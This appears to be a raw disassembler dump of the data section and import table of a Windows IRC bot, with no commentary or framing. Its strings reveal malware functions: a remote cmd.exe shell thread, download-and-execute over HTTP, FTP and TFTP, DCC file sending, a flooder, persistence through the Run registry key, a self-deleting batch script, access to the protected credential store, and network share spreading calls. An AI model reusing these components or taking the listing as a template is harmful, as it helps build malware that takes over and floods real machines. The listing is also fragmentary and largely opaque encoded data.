dword_417100 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_417104 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_417108 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_414EF4+5CE�r ...
dword_41710C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection dd 0
dword_417114 dd 77C1C1F3h ; resolved to->MSVCRT._itoadword_417118 dd 77C464BFh ; resolved to->MSVCRT._strnicmpdword_41711C dd 77C226F6h ; resolved to->MSVCRT._CxxThrowExceptiondword_417120 dd 77C21868h dword_417124 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_417128 dd 77C472B0h ; resolved to->MSVCRT.memmovedword_41712C dd 77C46030h ; resolved to->MSVCRT.strcpydword_417130 dd 77C35E02h ; resolved to->MSVCRT._rotrdword_417134 dd 77C35DDEh ; resolved to->MSVCRT._rotldword_417138 dd 77C3FF8Ah ; resolved to->MSVCRT._vsnprintfdword_41713C dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_417140 dd 77C1C9C9h ; resolved to->MSVCRT.tolowerdword_417144 dd 77C47730h ; resolved to->MSVCRT.strcmpdword_417148 dd 77C4186Ah ; resolved to->MSVCRT.printfdword_41714C dd 77C29CC5h dword_417150 dd 77C29CDDh dword_417154 dd 77C3FE49h ; resolved to->MSVCRT.vsprintfdword_417158 dd 77C3A3DBh ; resolved to->MSVCRT._beginthreadexdword_41715C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_417160 dd 77C50290h ; resolved to->MSVCRT.ceildword_417164 dd 77C4FA10h ; resolved to->MSVCRT._ftoldword_417168 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_41716C dd 77C2C437h ; resolved to->MSVCRT.reallocdword_417170 dd 77C47A50h ; resolved to->MSVCRT.strncmpdword_417174 dd 77C3FA76h ; resolved to->MSVCRT._snprintfdword_417178 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_41717C dd 77C41B72h ; resolved to->MSVCRT.sscanfdword_417180 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_417184 dd 77C4139Ch ; resolved to->MSVCRT.fseekdword_417188 dd 77C411FBh ; resolved to->MSVCRT.freaddword_41718C dd 77C3F010h ; resolved to->MSVCRT.fopendword_417190 dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_417194 dd 77C4173Bh ; resolved to->MSVCRT.fwritedword_417198 dd 77C41574h ; resolved to->MSVCRT.ftelldword_41719C dd 77C46040h ; resolved to->MSVCRT.strcatdword_4171A0 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_4171A4 dd 77C4A969h ; resolved to->MSVCRT.clockdword_4171A8 dd 77C3F931h ; resolved to->MSVCRT.sprintfdword_4171AC dd 77C47A90h ; resolved to->MSVCRT.strncpydword_4171B0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_4171B4 dd 77C2C21Bh ; resolved to->MSVCRT.freedword_4171B8 dd 77C2C407h ; resolved to->MSVCRT.mallocdword_4171BC dd 77C478A0h ; resolved to->MSVCRT.strlendword_4171C0 dd 77C4624Eh ; resolved to->MSVCRT._stricmp align 8
dword_4171C8 dd 7712A63Fh align 10h
dword_4171D0 dd 7CA40EE0h ; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_4171DC dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericAdword_4171E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_408F2E+1D1�r ...
dword_4171E4 dd 7E43212Bh ; resolved to->USER32.GetWindowTextA ; sub_415B60+84�r
dword_4171E8 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_4171EC dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_4050EA+106�r ...
dword_4171F8 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4171FC dd 71AC1028h ; resolved to->WS2_32.accept ; sub_4048EF+39F�r
dword_417200 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_412A3A+178�r ...
dword_417204 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4055E5+7B�r ...
dword_417208 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_411DC5+DF�r ...
dword_41720C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40A9CF+1A74�r
dword_417210 dd 71AC0B50h ; resolved to->WS2_32.getpeername ; sub_4045B2+21�r
dword_417214 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_40447B+10�r
dword_417218 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4046BC+CE�r ...
dword_41721C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_40732D+1A8�r ...
dword_417220 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4038BA+171�r ...
dword_417224 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_4038BA+186�r ...
dword_417228 dd 71ABE59Dh ; resolved to->WS2_32.getservbyportdword_41722C dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_404E1C+E0�r ...
dword_417230 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB2A5Eh ; resolved to->WS2_32.WSASetLastError ; sub_403588+4A�r ...
dword_417238 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_403588+1FE�r ...
dword_41723C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4055E5+F3�r ...
dword_417240 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_40449C+21�r ...
dword_417244 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4055E5+DD�r ...
dword_417248 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_4053DC+27�r ...
dword_41724C dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_4020C2+201�r
dword_417250 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_411DC5+372�r ...
dword_417254 dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_407148+183�r ...
dword_417258 dd 71AB2D0Fh ; resolved to->WS2_32.recvfromdword_41725C dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_417260 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_417264 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_417268 dd 71AB88D3h ; resolved to->WS2_32.listen align 10h
flt_417270 dd 0.0 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 0.0 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 4 dup(0) dword_417288 dd 4 dup(0) dword_417298 dd 7 dup(0) dword_4172B4 dd 27h dup(0) ; .packed:00416F3A�o ...
dword_417350 dd 1Ah dup(0) dword_4173B8 dd 312h dup(0) off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r ...
dd offset dword_41805C
dd offset dword_418040
dd offset dword_418014
dd 0
dword_418014 dd 0E4E4BFB1h, 0FD92B7D8h, 0B6ACE2BDh, 0DEB4A195h, 0DFC5928Ch
; DATA XREF: .packed:0041800C�o
dd 0CAABA9F1h, 0BDB1D394h, 0DD98A78Fh, 0D1C4AABEh, 2 dup(0)
dword_418040 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0FFEB9284h
; DATA XREF: .packed:00418008�o
dd 0BFD1h, 0
dword_41805C dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .packed:00418004�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 0C3928695h, 0D5D48F94h, 0EEh, 0
dword_418098 dd 0C4D189B1h, 0DBBC9BEAh, 0B0B7DD94h, 0DE84BA89h, 0E7EB9284h
; DATA XREF: .packed:off_418000�o
dd 0D1AA94F4h, 9082E3BFh, 0D485A78Eh, 0D5E1928Ch, 0D1A789EFh
dd 0A68CCCA6h, 95h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69hdword_4184C0 dd 7075202Ch, 69746164h, 676Ehunk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ahdword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775haModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h dword_418A1C dd 9EC09195h, 0D0A198ABh, 0B6B0BEADh, 8Fh, 0dword_418A30 dd 2E3031h dword_418A34 dd 2E323931h, 2E383631h, 0dword_418A40 dd 2E323731h, 0 dword_418A48 dd 2E373231h, 0 dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; sub_41113B+45A�o
dword_418A5C dd 313A3Ah dword_418A60 dd 7525h ; sub_4055E5+69E�o ...
dword_418A64 dd 252E7525h, 75252E75h, 3A75252Eh, 7525h ; sub_4055E5+40B�o ...
aU_U_U_UU db '%u.%u.%u.%u:%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+2A3�o
; sub_4055E5+3AF�o ...
align 4
aU db '%u',0Dh,0Ah,0 ; DATA XREF: sub_4055E5+229�o
; sub_4055E5+351�o ...
align 10h
aLgFlooder db 'LG flooder',0 ; DATA XREF: sub_405E45+109�o
align 4
aGetmoduleinfor db 'GetModuleInformation',0 ; DATA XREF: sub_405FA3+5E�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_405FA3+4B�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_405FA3+38�o
align 10h
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_405FA3:loc_405FC8�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_405FA3+F�o
align 4
aSystem db 'system',0 ; DATA XREF: sub_406041+136�o
; .packed:0041BBD0�o ...
align 4
dword_418B04 dd 2343003h, 3693425h, 25202E02h, 20583830h, 58383025h
; DATA XREF: sub_40637C+FE�o
dd 732520h
dword_418B1C dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 320676Eh
; DATA XREF: sub_40637C+51�o
dd 25023430h, 2032569h, 6F727020h, 73736563h, 3A7365h
dword_418B44 dd 7473694Ch, 6F727020h, 73736563h, 7365hdword_418B54 dd 58323025h, 0 ; sub_4147E5+11�o ...
dword_418B5C dd 58383025h, 0 ; sub_40A9CF+1C12�o
dword_418B64 dd 7325h ; sub_406722+296�o ...
aHkus db 'HKUS',0 ; DATA XREF: sub_406722+8D�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: sub_406722+6B�o
align 4
aHkcu db 'HKCU',0 ; DATA XREF: sub_406722+49�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: sub_406722+27�o
align 4
off_418B88 dd offset dword_418DD0 ; DATA XREF: sub_406E8E+4B�r
; sub_406E8E+8D�r ...
off_418B8C dd offset dword_418DA8 ; DATA XREF: sub_406E8E+106�r
; sub_406E8E+12A�r ...
dd offset loc_418D98
dd offset dword_418DA8
dd offset dword_418D88
dd offset dword_418D64
dd offset dword_418D54
dd offset dword_418D34
dd offset dword_418D20
dd offset dword_418D34
dd offset dword_418D0C
dd offset dword_418CF4
dd offset dword_418CE4
dd offset dword_418CD0
dd offset dword_418CBC
dd offset dword_418C9C
dd offset dword_418C88
dd offset dword_418C6C
dd offset dword_418C5C
dd offset dword_418C6C
dd offset dword_418C4C
dd offset dword_418C24
dd offset dword_418C10
dd offset dword_418BF0
align 10h
dword_418BF0 dd 0C2D48FAFh, 0D8A189F2h, 0BD97B0BCh, 0DF85B08Fh, 0F5979287h
; DATA XREF: .packed:00418BE4�o
dd 0D1A28AE5h, 0ACF5BAh, 0
dword_418C10 dd 0C0CF838Bh, 0DBBC95F1h, 0B6A6F5E6h, 2 dup(0)
; DATA XREF: .packed:00418BE0�o
dword_418C24 dd 0DCC796A3h, 0CAAF99F4h, 0F3B0FFA1h, 0D48EB4B7h, 0D1F0C690h
; DATA XREF: .packed:00418BDC�o
dd 0DFB99FE9h, 0B68DB0B1h, 0D29EA389h, 87h, 0
dword_418C4C dd 0C3D08A83h, 0DBB69FB3h, 2 dup(0)dword_418C5C dd 0DFD89691h, 90B889D4h, 0BBE8ADh, 0dword_418C6C dd 0DFD896B1h, 9EBC9FF1h, 80BCE59Bh, 0D483A682h, 0C0F6C68Fh
; DATA XREF: .packed:00418BCC�o
; .packed:00418BD4�o
dd 0EDh, 0
dword_418C88 dd 0DFD89691h, 0DDB889F1h, 0B6A6F5E6h, 2 dup(0)
; DATA XREF: .packed:00418BC8�o
dword_418C9C dd 0D4D98FB5h, 9EBD8DF2h, 0A4AAF586h, 919CA794h, 0D5C58FA4h
; DATA XREF: .packed:00418BC4�o
dd 0D2A29BEAh, 2 dup(0)
dword_418CBC dd 0D5C58F84h, 0D2A29BEAh, 0B6A6F5E6h, 2 dup(0)
; DATA XREF: .packed:00418BC0�o
dword_418CD0 dd 0D1D98FB5h, 0FFEE8AF0h, 0A7B0F5AFh, 2 dup(0)
; DATA XREF: .packed:00418BBC�o
dword_418CE4 dd 0D1D98F95h, 0DBE08AF0h, 0F5B0h, 0dword_418CF4 dd 0D4D98FB5h, 9EBD8DF2h, 0BFAEE88Dh, 0C392A794h, 2 dup(0)
; DATA XREF: .packed:00418BB4�o
dword_418D0C dd 0DCC79E87h, 0CCAB88F2h, 0B6A6F5E6h, 2 dup(0)
; DATA XREF: .packed:00418BB0�o
dword_418D20 dd 0F9D98F95h, 0D0A19DF2h, 0B6A6F5E6h, 2 dup(0)
; DATA XREF: .packed:00418BA8�o
dword_418D34 dd 0D4D98FB5h, 9EBD8DF2h, 0BCB9FF84h, 0C1B6F595h, 0D3DE8A92h
; DATA XREF: .packed:00418BA4�o
; .packed:00418BAC�o
dd 0D1A78EFCh, 0A6h, 0
dword_418D54 dd 0DFD0898Eh, 0C6ABD4F3h, 0ADh, 0dword_418D64 dd 0D5DE8AA1h, 0EDEE8EF3h, 0B6A8E2ADh, 0C4A5F589h, 0DDDE928Ch
; DATA XREF: .packed:00418B9C�o
dd 0CC9EDAF8h, 0A0BBF3A7h, 88h, 0
dword_418D88 dd 0C3C59581h, 0DBB69FB3h, 2 dup(0); ---------------------------------------------------------------------------
loc_418D98: ; DATA XREF: .packed:00418B90�o
stosd
xchg eax, ebp
setalc
retn
; ---------------------------------------------------------------------------
dd 0C6ABD4EEh, 0ADh, 0
dword_418DA8 dd 0D1D489AEh, 0DB9DDAF1h, 0BAACE5ABh, 0F0D7AC8Fh, 0DFDF9297h
; DATA XREF: .packed:off_418B8C�o
; .packed:00418B94�o
dd 0C7BA93EFh, 0A1BBC3E8h, 0D494BC8Dh, 2 dup(0)
dword_418DD0 dd 0D1C4958Eh, 0C6ABD4EEh, 0ADh, 0dword_418DE0 dd 293Ah dword_418DE4 dd 5Ch ; sub_406AE7+1B�o ...
dword_418DE8 dd 7078655Ch, 65726F6Ch, 78652E72h, 65haSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_406C51+1C�o
align 4
a@echoOffDelete db '@echo off',0Dh,0Ah ; DATA XREF: sub_406D90+A8�o
db ':deleteagain',0Dh,0Ah
db 'del /A:H /F %s',0Dh,0Ah
db 'del /F %s',0Dh,0Ah
db 'if exist %s goto deleteagain',0Dh,0Ah
db 'del %s',0Dh,0Ah,0
align 4
a_bat db '.bat',0 ; DATA XREF: sub_406D90+39�o
align 4
aWindowsDllLoad db 'Windows DLL Loader',0 ; DATA XREF: sub_406E8E+20D�o
; sub_407148+19D�o
align 10h
aQuitSUninstall db 'QUIT :%s uninstalled.',0 ; DATA XREF: sub_407148+177�o
; sub_407148+1C9�o
align 4
dword_418EB8 dd 6E6E6F43h, 69746365h, 66206E6Fh, 206D6F72h, 2343003h
; DATA XREF: sub_40732D+115�o
dd 2037325h, 206F7420h, 6B636F73h, 34300373h, 3752502h
dd 65732002h, 72657672h, 7325h
dword_418EEC dd 6A657220h, 65746365h, 64hdword_418EF8 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_40764D+6A�o
dd 736B636Fh, 72657320h, 20726576h, 70206E6Fh, 2074726Fh
dd 2343003h, 2037325h, 0
dword_418F2C dd 6B636F53h, 65732073h, 72657672h, 206E6F20h, 74726F70h
; DATA XREF: sub_4077DD+9C�o
dd 34300320h, 3732502h, 2
dword_418F4C dd 20h ; sub_407928+96�o ...
dword_418F50 dd 30h ; sub_40CA29+13D�o ...
dword_418F54 dd 252E7325h, 73252E73h, 73252Eh ; sub_40806A+BD�o
dword_418F60 dd 9ED9958Fh, 0A395FEh, 0; ---------------------------------------------------------------------------
loc_418F6C: ; DATA XREF: sub_408887+14�o
xchg eax, ebp
xchg eax, ecx
rcr byte ptr [esi-33436017h], 0A9h
mov esi, 0FB96BCBDh
xchg eax, ebp
retn
; ---------------------------------------------------------------------------
dd 2 dup(0)
dword_418F84 dd 9ED9958Fh, 9FF9h, 0; ---------------------------------------------------------------------------
loc_418F90: ; DATA XREF: sub_408887+30�o
xchg al, [edi-6B4C223Eh]
stosd
retf 0
; ---------------------------------------------------------------------------
align 10h
dword_418FA0 dd 0D7D88985h, 0DFE09FF1h, 0ADh, 0dword_418FB0 dd 0D5D98F8Ch, 90A089F0h, 0FDB3FFABh, 0A09Ah, 0off_418FC4 dd offset dword_4190E8 ; DATA XREF: sub_4088FC+19�r
; sub_4088FC+60�r
off_418FC8 dd offset loc_4190B4 ; DATA XREF: sub_4088FC+8A�r
dd offset dword_419098
dd offset dword_419054
dd offset dword_41903C
dd offset dword_418FE4
dd 2 dup(0)
dword_418FE4 dd 0DEC08986h, 0DAAF95F1h, 0BEBFF7E6h, 0C8D9A69Eh, 0DFD88E83h
; DATA XREF: .packed:00418FD8�o
dd 0D3A199B3h, 0BEBFF7E7h, 0D5D8A69Eh, 0DCD9918Dh, 91AA9BF2h
